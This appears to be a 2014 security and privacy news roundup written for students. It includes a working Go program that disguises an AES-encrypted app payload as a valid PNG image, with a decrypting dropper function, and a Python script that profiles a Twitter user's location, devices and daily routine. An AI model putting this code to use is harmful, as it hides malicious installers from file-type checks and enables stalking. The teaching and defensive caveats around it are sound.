Saturday, October 18, 2014
For my Computer Security students. Most companies warn their employees about unsolicited links and emails. This is just one version of the bad things that could happen.
Researchers have found a way to trick Android users into executing potentially malicious applications by hiding them inside innocent-looking image files.
Axelle Apvrille, mobile/IoT malware analyst and researcher at Fortinet, and Ange Albertini, reverse engineer and author of Corkami.com, have created an application that can be used to encrypt an APK to make it look like a PNG image file.
In a real attack leveraging this method, the attacker sends an application containing an image to the potential victim. When the app is launched, the victim only sees the harmless-looking image. In the background however, a malicious payload is installed onto the victim's Android device.
The encryption is done with AngeCryption, an application developed by the researchers.
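The trick behind a file that is both a valid PNG and the AES-CBC encryption of an APK is that CBC lets the sender choose the first ciphertext block: C0 = E_k(P0 XOR IV), so IV = D_k(C0) XOR P0 makes C0 whatever you like. The following Go program is an added example written for this post, not the researchers' AngeCryption code: it forces C0 to be the PNG signature plus the header of a junk chunk that swallows the rest of the ciphertext, appends the chunks of a real decoy image, and then checks that Go's image/png decoder still accepts the file and that the payload decrypts back out. The key, the stand-in payload, the private chunk type "zzZz" and the assumption that the dropper knows the payload length are all constructed for the example; the real tool also has to keep the APK (a ZIP) valid with the decoy bytes trailing it, which this example sidesteps by never decrypting them.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/binary"
	"fmt"
	"hash/crc32"
	"image"
	"image/color"
	"image/png"
)

// pngSig is the fixed 8-byte PNG signature.
var pngSig = []byte{0x89, 'P', 'N', 'G', '\r', '\n', 0x1a, '\n'}

// pkcs7Pad pads p to whole AES blocks (always adds at least one byte).
func pkcs7Pad(p []byte) []byte {
	n := aes.BlockSize - len(p)%aes.BlockSize
	return append(append([]byte{}, p...), bytes.Repeat([]byte{byte(n)}, n)...)
}

// decoyPNG encodes a tiny real image (assumption: any valid PNG would do);
// its IHDR/IDAT/IEND chunks are what make the crafted file render.
func decoyPNG() ([]byte, error) {
	img := image.NewRGBA(image.Rect(0, 0, 1, 1))
	img.Set(0, 0, color.RGBA{R: 255, A: 255})
	var buf bytes.Buffer
	err := png.Encode(&buf, img)
	return buf.Bytes(), err
}

// Craft returns an IV and a file that is a valid PNG whose leading bytes are
// AES-CBC(key, iv, payload).  Choosing IV = D_k(C0) XOR P0 dictates C0, which
// we set to signature || length || type of a junk chunk holding every other
// ciphertext block.  "zzZz" (assumed) is an ancillary, private chunk type that
// decoders skip; the decoy's real chunks follow it and get rendered.
func Craft(key, payload, decoy []byte) (iv, file []byte, err error) {
	blk, err := aes.NewCipher(key)
	if err != nil {
		return nil, nil, err
	}
	if !bytes.HasPrefix(decoy, pngSig) {
		return nil, nil, fmt.Errorf("decoy is not a PNG")
	}
	pt := pkcs7Pad(payload)
	c0 := make([]byte, aes.BlockSize)
	copy(c0, pngSig)
	binary.BigEndian.PutUint32(c0[8:12], uint32(len(pt)-aes.BlockSize)) // junk chunk length
	copy(c0[12:16], "zzZz")                                            // junk chunk type
	iv = make([]byte, aes.BlockSize)
	blk.Decrypt(iv, c0) // iv = D_k(C0) ...
	for i := range iv { // ... XOR P0
		iv[i] ^= pt[i]
	}
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(blk, iv).CryptBlocks(ct, pt)
	// Close the junk chunk with its CRC over type || data, then append the
	// decoy's chunks (everything after its 8-byte signature).
	crc := make([]byte, 4)
	binary.BigEndian.PutUint32(crc, crc32.ChecksumIEEE(ct[12:]))
	file = append(append(append([]byte{}, ct...), crc...), decoy[8:]...)
	return iv, file, nil
}

// Recover is the dropper's side: decrypt only the leading blocks with the
// shipped key/IV and strip the padding.  n, the payload length, is assumed
// known to the dropper; the decoy chunks after it are never decrypted.
func Recover(key, iv, file []byte, n int) ([]byte, error) {
	blk, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	padded := (n/aes.BlockSize + 1) * aes.BlockSize
	if padded > len(file) {
		return nil, fmt.Errorf("file shorter than the padded payload")
	}
	pt := make([]byte, padded)
	cipher.NewCBCDecrypter(blk, iv).CryptBlocks(pt, file[:padded])
	return pt[:n], nil
}

// RendersAsPNG reports whether Go's image/png decoder accepts the file.
func RendersAsPNG(file []byte) bool {
	_, err := png.Decode(bytes.NewReader(file))
	return err == nil
}

func main() {
	key := []byte("0123456789abcdef")                         // constructed demo key
	payload := []byte("PK\x03\x04 stand-in for the APK bytes") // constructed, not a real APK
	decoy, _ := decoyPNG()
	iv, file, err := Craft(key, payload, decoy)
	if err != nil {
		panic(err)
	}
	got, _ := Recover(key, iv, file, len(payload))
	fmt.Printf("renders as PNG: %v; payload recovered: %v; %d bytes on disk\n",
		RendersAsPNG(file), bytes.Equal(got, payload), len(file))
}
```

Two caveats a defender should take from this: the first 16 bytes of the "image" are AES output and still match the PNG signature exactly, so magic-byte checks and file-type filters learn nothing; and the only real requirement on the decoder is that it skips an unknown chunk before IHDR, which Go's decoder does but stricter decoders may not. The detection lever is the wrapper app's behaviour (decrypting an asset and calling the package installer), not the image file.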
The FBI would settle for a wide open front door. (Bad advice makes you seem silly.)
Thursday, FBI Director James Comey delivered a talk at the Brookings Institution, titled “Going Dark: Are Technology, Privacy, and Public Safety on a Collision Course?” His thesis did not stray too far from his (and others’) recent calls for limitations on software from companies like Google and Apple that employs strong cryptography that even the companies themselves cannot break, even if law enforcement agencies produce a warrant for the encrypted data. Law enforcement has called for companies to provide “back doors” to encryption and other security systems, through which companies could “unlock” the data by using, as one editorial board unfortunately put it, a “secure golden key they would retain and use only when a court has approved a search warrant.”
The problem with the “golden key” approach is that it just doesn’t work. While a golden key that unlocks data only for legally authorized surveillance might sound like an ideal solution (assuming you trust the government not to abuse it), we don’t actually know how to provide this functionality in practice. Security engineers, cryptographers, and computer scientists are in almost universal agreement that any technology that provides a government back door also carries a significant risk of weakening security in unexpected ways. In other words, a back door for the government can easily – and quietly – become a back door for criminals and foreign intelligence services.
(Related) A more “to the point” headline! (Links to other contradictory articles.)
“...and now for something completely different.” Monty Python
Safeguarding the Personal Information of all People – ODNI
Office of the Director of National Intelligence (ODNI) – Safeguarding the Personal Information of all People, July 2014.
“As the President said in his speech on January 17, 2014, “the challenges posed by threats like terrorism, proliferation, and cyber-attacks are not going away any time soon, and for our intelligence community to be effective over the long haul, we must maintain the trust of the American people, and people around the world.” As a part of that effort, the President made clear that the United States is committed to protecting the personal information of all people regardless of nationality. This commitment is reflected in the directions the President gave to the Intelligence Community on that same day, when he issued Presidential Policy Directive/PPD-28, Signals Intelligence Activities. New Standards for Safeguarding Privacy: PPD-28 reinforces current practices, establishes new principles, and strengthens oversight, to ensure that in conducting signals intelligence activities, the United States takes into account not only the security needs of our nation and our allies, but also the privacy of people around the world. The Intelligence Community already conducts signals intelligence activities in a carefully controlled manner, pursuant to the law and subject to layers of oversight, focusing on important foreign intelligence and national security priorities. But as the President recognized, “[o]ur efforts will only be effective if ordinary citizens in other countries have confidence that the United States respects their privacy too.” To that end, the Intelligence Community has been working hard to implement PPD-28 within the framework of existing processes, resources, and capabilities, while ensuring that mission needs continue to be met. In particular, PPD-28 directs intelligence agencies to review and update their policies and processes – and establish new ones as appropriate – to safeguard personal information collected through signals intelligence, regardless of nationality and consistent with our technical capabilities and operational needs.”
In order to be “fair,” shouldn't your opponents also receive an indication that you are fatigued?
Pablo S. Torre and Tom Haberstroh report:
… The boom officially began during work hours. Before last season, all 30 arenas installed sets of six military-grade [??? Bob] cameras, built by a firm called SportVU, to record the x- and y-coordinates of every person on the court at a rate of 25 times a second — a technology originally developed for missile defense in Israel. This past spring, SportVU partnered with Catapult, an Australian company that produces wearable GPS trackers that can gauge fatigue levels during physical activity. Catapult counts a baker’s dozen of NBA clients, including the exhaustion-conscious Spurs, and claims Mavericks owner Mark Cuban as both a customer and investor. To front offices, the upside of such devices is rather obvious: Players, like Formula One cars, are luxury machines that perform best if vigilantly monitored, regulated and rested.
Read more on ESPN.
In case you didn't know, when you book a flight the government must okay issuance of a boarding pass.
From Papers, Please!:
We talked at length with Watchdog investigative reporter Dave Lieber for his column in today’s Dallas Morning News: Travelers, say bon voyage to privacy.
Lieber hits the nail on the head by calling out how few travelers realize that the U.S. government is keeping a permanent file of complete mirror copies of their reservations.
Read more on Papers, Please!
Your car is just another thing on the Internet of Things.
Dr. Stefan Schuppert writes:
The Conference of the German Federal and State Data Protection Authorities during its last meeting on 8 and 9 October adopted the resolution “Data Protection in the Car”. The resolution expresses a concern about what it describes as privacy risks involved in the growing collection and processing of personal data in cars, and the interests of various actors (car manufacturers, service providers, insurance companies, employers) in using those data.
The resolution outlines several obligations of car manufacturers, dealers, repair shops, and providers of communication services.
Read more on Hogan Lovells Chronicle of Data Protection.
More words or mere words?
Katherine Gasztonyi writes:
At the International Conference of Data Protection and Privacy Commissioners in Mauritius this week, representatives of the private sector and academia joined together to discuss the positive changes and attendant risks that the internet of things and big data may bring to daily life. Attendees memorialized the observations and conclusions of their discussions in a Declaration on the Internet of Things and a Resolution on Big Data. The documents are not, of course, binding. But, the fact that the Declaration and Resolution drew the consensus of a large gathering of international data protection regulators renders them relevant indicators of direction of data privacy policies and trends.
Read more on Covington & Burling Inside Privacy.
Now this is interesting. We can drag the Copyright lawyers (no doubt kicking and screaming) into the technical discussions about Big Data and the Internet of Things. What if I seeded Denver with devices that transmitted, “I am Bob's thing number 762. I am located at 39° 44' 21" N / 104° 59' 3" W Copyright © 2014 by Bob. You owe me $0.02 for this information.”
Big data and the “internet of things” — in which everyday objects can send and receive data — promise revolutionary change to management and society. But their success rests on an assumption: that all the data being generated by internet companies and devices scattered across the planet belongs to the organizations collecting it. What if it doesn’t?
Alex “Sandy” Pentland, the Toshiba Professor of Media Arts and Sciences at MIT, suggests that companies don’t own the data, and that without rules defining who does, consumers will revolt, regulators will swoop down, and the internet of things will fail to reach its potential. To avoid this, Pentland has proposed a set of principles and practices to define the ownership of data and control its flow. He calls it the New Deal on Data. It’s no less ambitious than it sounds. In the November issues of HBR, Pentland discusses how the New Deal is being received and how it’s already working in a little town in the Italian Alps.
Just because Google can't point to an article does not mean the article goes away.
BBC to publish 'right to be forgotten' removals list
The BBC is to publish a continually updated list of its articles removed from Google under the controversial "right to be forgotten" rule.
The ruling allows people to ask Google to remove some types of information about them from its search index.
But editorial policy head David Jordan told a public meeting, hosted by Google, that the BBC felt some of its articles had been wrongly hidden.
… Google decided to notify affected websites each time a link had been removed.
The BBC will begin - in the "next few weeks" - publishing the list of removed URLs it has been notified about by Google.
Eventually, your phone will do everything for you and keep on doing it for months (years?) after your death.
Google: We'll make you smarter ... if you share your data
Google's chairman says the search giant can create your ideal artificial personal assistant. The catch? You need to give up more and more of your personal information.
Tools for personal security.
MasterCard's New Credit Card Will Come With a Fingerprint Scanner
… MasterCard is now teaming up with biometric tech company Zwipe to prevent people from paying for items this way with stolen credit cards. It's a way to prove that it's actually you using the card.
The Zwipe MasterCard, which might be offered only in the UK for now, comes with a built-in fingerprint scanner that stores your thumbprint. When you put your thumb on the scanner, the embedded chip unlocks and you'll be able to tap the card to make purchases.
My world is changing – Harvard tells me so.
… Broadly speaking, competency-based education identifies explicit learning outcomes when it comes to knowledge and the application of that knowledge. They include measurable learning objectives that empower students: this person can apply financial principles to solve business problems; this person can write memos by evaluating seemingly unrelated pieces of information; or this person can create and explain big data results using data mining skills and advanced modeling techniques.
… The key distinction is the modularization of learning. Nowhere else but in an online competency-based curriculum will you find this novel and flexible architecture. By breaking free of the constraints of the “course” as the educational unit, online competency-based providers can easily and cost-effectively stack together modules for various and emergent disciplines.
A New Initiative: The GA Credentialing Network
… In partnership with a consortium of more than twenty companies, including GE, PayPal, and Elance-oDesk, we are developing a series of competency-based credentials for high-skilled positions in technology, design, and business. Our first credential, for web development skills, will be publicly available in early 2015. This initial program —and those that follow—will be available to job-seekers beyond the limits of the General Assembly student community, and will be free of charge for both job-seekers and employers.
For my lucky spreadsheet students.
35 Years Ago Today, Spreadsheets Were Invented
On this day in 1979, a computer program called VisiCalc first shipped for the Apple II platform, marking the birth of the spreadsheet, a now-ubiquitous tool used to compile everything from grocery lists to Fortune 500 company accounts.
And that’s why October 17th is Spreadsheet Day, celebrated by fans of the form.
I've been looking for a simple tutorial for my Math students.
How to Calculate Using Japanese Abacus Part 1
Hard to believe they are serious...
… LAUSD will not release an inspector general’s report into the district’s decision-making process that went into its massive purchase of iPads and Pearson curriculum. The school board voted 4–3 against releasing the information to the public.
… LAUSD Superintendent John Deasy resigned this week, on the heels of investigations into the district’s iPad procurement process and failures of its new student information system. Ray Cortines has been named interim superintendent.
… A group of Harvard Law School professors say that the university’s new sexual assault policies “lack the most basic elements of fairness and due process, are overwhelmingly stacked against the accused, and are in no way required by Title IX law or regulation.”
… “The Public Sociology Association, made up of graduate students at George Mason University, has published what adjunct advocates are calling the most comprehensive study of one institution’s adjunct faculty working conditions ever.” More on the report via Inside Higher Ed. http://www.hackeducation.com/2014/10/17/hack-education-weekly-news-10-17-2014/
Friday, October 17, 2014
I'm sure the FBI would find their job easier if they had a backdoor into all encryption systems, but they must realize that is impossible. (I can write an encryption program in minutes) Nor do they seem to need them in any significant percentage of cases. (9/3576 = 0.0025 or slightly more than ¼ of one percent)
From the wiretap report available from USCourts.gov:
… The number of federal and state wiretaps reported in 2013 increased 5 percent from 2012. A total of 3,576 wiretaps were reported as authorized in 2013, with 1,476 authorized by federal judges and 2,100 authorized by state judges.
… The number of state wiretaps in which encryption was encountered increased from 15 in 2012 to 41 in 2013. In nine of these wiretaps, officials were unable to decipher the plain text of the messages. Encryption was also reported for 52 state wiretaps that were conducted during previous years, but reported to the AO for the first time in 2013. Officials were able to decipher the plain text of the communications in all 52 intercepts.
F.B.I. Director Hints at Action as Cellphone Data Is Locked
The director of the F.B.I., James B. Comey, said on Thursday that the “post-Snowden pendulum” that has driven Apple and Google to offer fully encrypted cellphones had “gone too far.” He hinted that as a result, the administration might seek regulations and laws forcing companies to create a way for the government to unlock the photos, emails and contacts stored on the phones.
But Mr. Comey appeared to have few answers for critics who have argued that any portal created for the F.B.I. and the police could be exploited by the National Security Agency, or even Russian and Chinese intelligence agencies or criminals. And his position seemed to put him at odds with a White House advisory committee that recommended against any effort to weaken commercial encryption.
… Any technology that allows the United States government to bypass encryption in the name of solving crimes could also allow hackers and foreign governments to bypass encryption in the name of stealing secrets.
In Defense of iPhones the FBI Can't Search
(Related) I can't resist asking, is there a business opportunity here? Surveillance-R-Us?
Police Departments Skirting Public Accountability By Using Private Foundations To Obtain Controversial Surveillance Technology
Tim Cushing writes:
The less the public knows about law enforcement surveillance technology, the better. That’s the thought process governing the purchase and deployment of technology like Stingray devices and automatic license plate readers. In the case of the former, even the nation’s top cops (the FBI) actively discourage talking about the cell tower spoofers through the use of restrictive non-disclosure agreements.
If the normal routes — as deferential as they are — seem to be a bit too “leaky,” many law enforcement agencies have a third option available to keep the public in the dark about their technology acquisitions: private funding.
Read more on TechDirt.
A poor choice of which fight to fight?
Cyber-Sleuth or Cyber-Thief? LabMD Case Continues to Expose the Good, the Bad, and the Downright Ugly in Cyber-Security Developments
Over on HIPAA, HITECH, and HIT, Elizabeth Litten comments on FTC’s administrative case against LabMD, a case I’ve been following here for the past few years. After recapping the case, she writes:
This case isn’t over, and it remains to be seen whether [Administrative Law Judge] Chappell will find the witness’s testimony credible and/or relevant to a finding that LabMD violated Section 5. It also remains to be seen whether the FTC and Tiversa will end up looking like cyber-sleuths out to uncover, and protect the public from, lax security practices, or will look more like cyber-thieves grasping for money, power, publicity or something else. Either way, this case is ugly and certainly does not create a high level of confidence in the cyber-security investigation and enforcement tactics utilized by the FTC.
Read her full column on HIPAA, HITECH, and HIT.
Have I not been saying all along that even if FTC could go after LabMD, I did not think this was a good use of their resources? And have I not been saying all along that this case strikes me as somewhat unfair to LabMD whose security – other than an employee not following policy (which still happens ALL the time) – was on a par with other HIPAA-covered entities’ data security back in 2008? If HIPAA decided not to go after LabMD for violations of its Security Rule, should FTC be taking a sledgehammer to LabMD?
There are those who will claim that the only reason the FTC went after LabMD was because LabMD didn’t play the game and cooperate by jumping at every request and turning over thousands of pages of documents. But when all is said and done, does this action by the FTC do a damned thing to protect consumers? I think not, and can think of a lot of serious cases in the healthcare sector that the FTC should pursue – like a breach where patients weren’t even notified that their SSN and details were available for free download on Pirate Bay.
The FTC has done tremendous yeoman service in protecting consumers’ privacy, but sadly, not in this case.
It's better to ask forgiveness than to ask permission?
Dan Novack writes:
What’s public for me is private for thee. At least that’s what Monroe County, N.Y. believes when it comes to where you drive your car.
Monroe Police have been using high-speed cameras to capture license plates in order to log vehicle whereabouts. As of July, the County’s database contained 3.7 million records, with the capability to add thousands more each day. The justification for cops having records of the whereabouts of law-abiding citizens is that the vehicles are driven in public and therefore drivers have no expectation of privacy. It’s an argument that’s at odds with the Supreme Court’s 2012 ruling in U.S. v. Jones. In Jones, a GPS tracking case, the court held that individuals do have an expectation of privacy when it comes to their long-term whereabouts, even when using public roads.
Read more on The Intercept.
So, real-time requires a real warrant?
John Wesley Hall writes:
Real-time cell site location information is protected under Fourth Amendment. Tracey v. State, SC11-2254 (October 16, 2014). This is a fascinating opinion, and it’s the most sensitive review of the issue yet.
Read an excerpt from the opinion on FourthAmendment.com
An infographic for those of us who remember all these things...
Famous Internet Firsts And Where We Are Now
A tool my students could use to create their own infographics.
Canva Launches an iPad App for Creating Beautiful Infographics and Slides
Canva is a great service for creating infographics, slides, and photo collages. The service launched last fall and has steadily grown since then. The latest update to Canva was the launch of their free iPad app.
The Canva iPad app allows you to create infographics, slides, and photo collages in much the same way as the web version of the service. To create a graphic on Canva start by selecting a template then dragging and dropping into place background designs, pictures, clip art, and text boxes. Canva offers a huge library of clip art and photographs to use in your designs (some of the clip art is free, some is not). You can also import your own images to use in your graphics. Your completed Canva projects can be saved as PDF and PNG files. You can also simply link to your online graphic.
Interesting. The world, she is a-changing.
Essay · The future of the book
Thursday, October 16, 2014
For my Computer Security students. (Report available from HP)
Cost of Cyber Attacks Jumps for US Firms: Study
A survey of 59 US firms by the Ponemon Institute with Hewlett-Packard found the average annual cost of responding to cyber attacks was $12.7 million, up 96 percent over the previous five years.
The organizations saw a 176 percent increase in the number of cyber attacks, with an average of 138 successful attacks per week, compared to 50 attacks per week when the study was initially conducted in 2010.
The average time to detect an attack was 170 days, and it took on average 45 days to resolve a cyber incident, costing an average of $1.6 million, according to the researchers.
Teens: “We have the technology, let's use it!” Old Geezer (Bob): “I have the technology. I can't think of a reason to use it.”
Google study shows that we use Voice Search for a lot of embarrassing things
… A study commissioned by Google on how people use voice search was released today, and from it we've learned more than we ever wanted to know about how people use voice search.
… Apparently, 22 percent of teens have for some reason admitted to using voice search while in the bathroom. When you're in the age group that uses voice search most often, you're not going to let a quick pit stop to the restroom stop you from talking to your smartphone. The study found that 55 percent of teens ages 13 to 18 use hands-free search every day, compared to 41 percent of adults.
… In response to the question, "pick one thing you wish you could ask your phone to do for you," 45 percent of teens chose "send me a pizza." Boring adults chose the boring answer "tell me where my keys are" to the tune of 44 percent, but 36 percent of adults showed that they still have some fun in them by also saying they would like voice search to send them pizzas.
Could be useful. I'll add this to my Disaster Recovery class. Facebook will probably map “disasters” worldwide and become the “website of doom.”
Facebook's 'Safety Check' lets friends know you're safe
During a major disaster, Facebook users can let their friends and family know they are safe by using the new Safety Check tool.
When the tool is activated and Facebook determines that a user may be in an area where a natural disaster occurred, the social network will send a notification asking if the user is safe. If the response “I’m Safe” is selected, Facebook will create a post and share it on the user’s news feed, telling friends they are out of peril. Friends too have the possibility to mark someone as safe.
Facebook determines a user’s location by looking at the city listed in their profile, their last location if they’ve opted in to the Nearby Friends service, and the city where they are using the Internet, presumably derived from their IP address. If the location is wrong the user can tell Safety Check they are not in the affected area.
(Related) Sometimes it's good that your “Things” know where you are and can tell anyone(?) who asks! (Is something seriously wrong with OnStar?)
'Find My iPhone' App Helps Locate Missing Motorist
A California woman who drove her car into a 500-foot ravine was rescued this week after her family and one clever police officer were able to determine her location via her iPhone, the San Jose Mercury News reported.
The unnamed, 28-year-old resident of Campbell, Calif. veered off Mount Hamilton Road in a 2012 Chevy Cruze on Monday and wound up spending 18 hours at the bottom of the ravine before being airlifted out by a Coast Guard helicopter on Tuesday morning, the newspaper reported.
Though her vehicle was outfitted with General Motors's OnStar system, which determines a vehicle's location by means of a roof-mounted GPS antenna, the company was not able to pinpoint where the car was, according to the Mercury News.
… An OnStar spokesperson also told the Mercury News that GM's system "only keeps track of users' locations at discrete moments in time, such as when an accident happens or when they call in to get driving directions from a particular place."
By contrast, when location tracking and location-based apps are enabled on an iPhone, the device and Apple's tracking system attempt to maintain an ongoing connection to pinpoint the location of the smartphone.
Revolt of the Content Providers?
HBO Launching Standalone Service In 2015
HBO has announced plans to offer a standalone subscription service starting sometime in 2015. HBO is currently only available to U.S. residents who also pay for a raft of other channels. But HBO CEO Richard Plepler has promised to go “beyond the wall” and launch a “stand-alone, over the top” version next year.
Details are thin on the ground, so it isn’t yet known how HBO will deliver such a service to customers, or what it’ll charge for the privilege. Regardless, this puts HBO on a collision course with streaming services, and Netflix in particular. But with an increasing number of people refusing to pay a small fortune for channels they don’t want to watch, HBO had to act, and fast.
Expanding the earlier survey.
A World of Beloved Books (According to Facebook)
What books have stayed with you?
… Back in September, Facebook tallied up the results of that status game worldwide. Its findings? The Harry Potter series, To Kill a Mockingbird, The Lord of the Rings, and Pride and Prejudice led the way. They were followed by none other than the Bible.
Since then, the game has gotten bigger, spreading to other countries and languages. In a new blog post, Facebook has unveiled which books are beloved in nations that have had 20,000 or more responses—that is, France, India, Italy, Mexico, Brazil, and the Philippines.
What did they find? In those six nations—as in the U.S. and U.K.-dominated first tally—the Boy Who Lives dominates.
… Facebook has the full list for each country on its site.
For my spreadsheet students.
How To Use An Excel Pivot Table For Data Analysis
For my Computer Security students, past & present.
Looking for a job? Cyber Aces is hosting another National Cybersecurity Career Fair in November
Last spring I wrote about Cyber Aces hosting its first National Cybersecurity Career Fair (NCCF). (See National Cybersecurity Career Fair in June Will Connect Employers to Entry Level Cybersecurity Workers.)
… The group held its first ever career fair this past June and the event was so successful that it has decided to make the career fair a semi-annual event. The next NCCF is scheduled for November 20 and 21, 2014. Now is the time to register and create your personal profile if you want to meet with prospective employers.
For my Android toting students. Probably a similar one for the iPhone.
– is an Android app that welcomes you into the world of data by showing you the output of all sensors of your Android device. Check the temperature, humidity, air pressure, gravity, light, acceleration and a lot more. Most sensors also display a chart with the output of the sensor so you can better watch the changes over time.
Wednesday, October 15, 2014
For my Ethical Hackers. I repeat, technically sophisticated hacks are fun, but the real money is in the huge volume of simple, low skill hacks that are available. (Note that management should be a bit concerned with their Security manager if they hear things like this.)
Byron Acohido reports:
Ethical hacker Bryan Seely of Seattle-based Seely Security showed how MBIA has long been exposing details of municipal bond and investment management accounts in a way that made it easy for criminals to transfer funds from existing accounts into newly created ones they control. There’s no evidence any theft took place, only because the bad guys appear to have overlooked this freebie.
Seely says he has identified more than 8,000 other servers that are similarly misconfigured and likewise exposing sensitive accounts on the open Internet. These are accounts that should be kept under lock and key.
Seely has been on a one-man campaign to notify organizations, and a few have listened to him.
Read more on Credit.com
[From the article:
“In the case of MBIA, it was not at risk because of a flaw in Oracle,” Seely says. “This was simply because the customer did not configure the server correctly when they deployed it, and it caused private banking records to be exposed to the Internet.”
(Related) Not hearing about security weaknesses is even worse. (Not to mention, pretending to not hear)
Did MCCCD leadership shut their eyes to a database security assessment for plausible deniability in litigation?
A former Maricopa County Community College District employee alleges executive leadership closed their eyes to a report on their database security conducted after their massive data breach in 2013 so they would have plausible deniability in any litigation. As a result, the employee alleges, the findings were never shared with those tasked with securing MCCCD’s data assets.
In November 2013, Maricopa County Community College District (MCCCD) disclosed that they had been informed by the FBI that 14 databases with personal information had been found up for sale on the Internet. The potential compromise of 2.5 million students’, employees’ and vendors’ personal and financial information currently stands as the largest breach ever in the education sector.
As part of its continuing investigation into that breach, DataBreaches.net recently disclosed parts of a report issued by Stach & Liu in 2011 after an earlier hacking incident. Failure to properly remediate that breach had been cited as a factor in the 2013 breach. Of special relevance now, MCCCD’s external counsel had asserted that MCCCD administration at the highest levels never even knew of the report’s existence until after the 2013 breach. [Apparently they don't read the local newspaper or watch local TV news. Bob] Their claim was disputed by former employee Earl Monsour, who stated he had delivered the report to the Vice Chancellor for ITS.
[I suggest you read the full article! Bob]
Is this because they have crazy people just across the border?
Cho Mu-hyun reports:
The shocking figure of over 106 million privacy breaches was unveiled by a report of data leaks between 2010 and 2014 filed by the Korea Communication Commission (KCC) to the National Assembly during the yearly government audit of ministries.
The figure means that each person has, on average, had his or her personal information leaked 2.1 times during the past four years in a country with a population of 50 million.
Read more on ZDNet.
For my Computer Security students. Should I add this to my “Stalker's Toolbox?”
How Anyone Can Find Your Personal Details Via Twitter With Tinfoleak
… There’s a free script called Tinfoleak which can pull an alarming amount of information about any Twitter user based simply on their profile and their tweets. Let me show you how it works.
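To make the point concrete for students, here is an added example (my own illustration, not Tinfoleak's code) of what a public timeline gives away without any hacking at all. Tinfoleak pulls tweets from the Twitter API; this script instead uses a handful of constructed tweets embedded inline, shaped like the v1.1 tweet object (created_at, source, coordinates, entities), so it runs offline. The field layout and the "centroid as a rough home guess" heuristic are my assumptions.

```python
from collections import Counter
from datetime import datetime
import re

# Constructed sample timeline (not real tweets); the shape mirrors the
# Twitter REST v1.1 tweet object that an OSINT tool like Tinfoleak reads.
SAMPLE_TWEETS = [
    {"created_at": "Mon Oct 13 07:12:04 +0000 2014",
     "source": '<a href="http://twitter.com/download/iphone" rel="nofollow">Twitter for iPhone</a>',
     "text": "Coffee before class #infosec",
     "coordinates": {"type": "Point", "coordinates": [-104.9903, 39.7392]},
     "entities": {"hashtags": [{"text": "infosec"}], "user_mentions": []}},
    {"created_at": "Tue Oct 14 07:40:51 +0000 2014",
     "source": '<a href="http://twitter.com/download/iphone" rel="nofollow">Twitter for iPhone</a>',
     "text": "@alice same corner, same time",
     "coordinates": {"type": "Point", "coordinates": [-104.9910, 39.7395]},
     "entities": {"hashtags": [], "user_mentions": [{"screen_name": "alice"}]}},
    {"created_at": "Tue Oct 14 18:05:19 +0000 2014",
     "source": '<a href="http://twitter.com" rel="nofollow">Twitter Web Client</a>',
     "text": "Reading about #infosec tonight",
     "coordinates": None,
     "entities": {"hashtags": [{"text": "infosec"}], "user_mentions": []}},
    {"created_at": "Wed Oct 15 22:30:00 +0000 2014",
     "source": '<a href="http://twitter.com/download/android" rel="nofollow">Twitter for Android</a>',
     "text": "Late night",
     "coordinates": {"type": "Point", "coordinates": [-105.0000, 39.7500]},
     "entities": {"hashtags": [], "user_mentions": []}},
    {"created_at": "Thu Oct 16 07:05:33 +0000 2014",
     "source": '<a href="http://twitter.com/download/iphone" rel="nofollow">Twitter for iPhone</a>',
     "text": "@bob see you at 9 #privacy",
     "coordinates": None,
     "entities": {"hashtags": [{"text": "privacy"}], "user_mentions": [{"screen_name": "bob"}]}},
]

TAG_RE = re.compile(r"<[^>]+>")
TIME_FMT = "%a %b %d %H:%M:%S %z %Y"   # Twitter's created_at layout


def client_names(tweets):
    """Count the apps used to post. The 'source' field is an HTML anchor
    whose text names the client, which hints at the user's devices and OS."""
    return Counter(TAG_RE.sub("", t["source"]) for t in tweets)


def geo_points(tweets):
    """Return (lat, lon, posted_at) for every geotagged tweet.
    Twitter stores GeoJSON order [longitude, latitude], so swap it."""
    pts = []
    for t in tweets:
        c = t.get("coordinates")
        if c and c.get("type") == "Point":
            lon, lat = c["coordinates"]
            pts.append((lat, lon, datetime.strptime(t["created_at"], TIME_FMT)))
    return pts


def hours_active(tweets):
    """Hour-of-day histogram (UTC): a daily routine shows up as a peak."""
    return Counter(datetime.strptime(t["created_at"], TIME_FMT).hour for t in tweets)


def hashtags_and_mentions(tweets):
    """Interests (hashtags) and social graph (who gets mentioned)."""
    tags = Counter(h["text"].lower() for t in tweets for h in t["entities"]["hashtags"])
    mentions = Counter(m["screen_name"].lower() for t in tweets for m in t["entities"]["user_mentions"])
    return tags, mentions


def profile(tweets):
    """Pull the pieces together into the kind of summary an OSINT tool prints."""
    pts = geo_points(tweets)
    centroid = None
    if pts:
        # Crude assumption: the mean of all geotagged points. A real tool would
        # cluster by time of day to separate 'home' from 'work'.
        centroid = (round(sum(p[0] for p in pts) / len(pts), 4),
                    round(sum(p[1] for p in pts) / len(pts), 4))
    tags, mentions = hashtags_and_mentions(tweets)
    return {
        "clients": client_names(tweets),
        "geotagged_tweets": len(pts),
        "centroid_lat_lon": centroid,
        "busiest_hour_utc": hours_active(tweets).most_common(1)[0][0],
        "hashtags": tags,
        "mentions": mentions,
    }


if __name__ == "__main__":
    for k, v in profile(SAMPLE_TWEETS).items():
        print(f"{k}: {v}")
```

The lesson for students is in the output, not the code: three of five posts carry precise coordinates, the same hour of the morning recurs at the same spot, and the client string names the phone. None of that requires an exploit, only a public timeline, which is why disabling tweet location and reviewing the "source" your apps attach is the first mitigation to discuss.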
Take that, Steve Jobs! (Could I follow this business model here in the US?)
… Xiaomi, the four-year-old Chinese smartphone manufacturer, has found just such a sweet spot, and as a result is taking the smartphone industry by a storm. Pundits claim that Xiaomi is just a Chinese copycat of Apple, and not without some reason. Some point to Xiaomi’s product introductions, which are eerily just like Apple’s. Others point out the strong similarities between Xiaomi’s operating system (named MIUI) and Apple’s iOS. What’s more, Xiaomi’s products rank among the best in the industry in terms of performance. All these cues might lead us to believe that it is competing head to head with the leading smartphone manufacturers.
However, looking at the full extent of Xiaomi’s business model reveals just how different – and how disruptive — it is. For starters, unlike Apple, Xiaomi is not targeting premium customers; it’s mostly teens buying those high-quality phones, and hardly at a premium, since Xiaomi’s prices are at least 60% lower. A neat trick. How does Xiaomi pull that off?
For my Ethical Hackers. Think of the fun possible by driving through a neighborhood, unlocking doors as you go!
